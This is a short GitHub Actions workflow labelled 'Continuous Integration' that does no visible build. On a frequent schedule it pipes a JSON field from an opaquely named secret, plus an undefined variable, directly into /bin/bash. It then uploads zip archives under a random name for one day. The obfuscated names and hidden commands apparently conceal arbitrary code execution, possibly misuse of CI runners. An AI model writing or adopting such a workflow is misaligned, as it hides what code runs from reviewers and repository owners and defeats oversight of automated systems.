name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '5 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          lj22: ${{ secrets.lj22 }}
        run: |
          printf '%s' "$lj22" | jq -r .s7 | /bin/bash
          echo $kq2953 | jq -r .gd7910 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: HHzzx3UB
          path: "*.zip"
          retention-days: 1
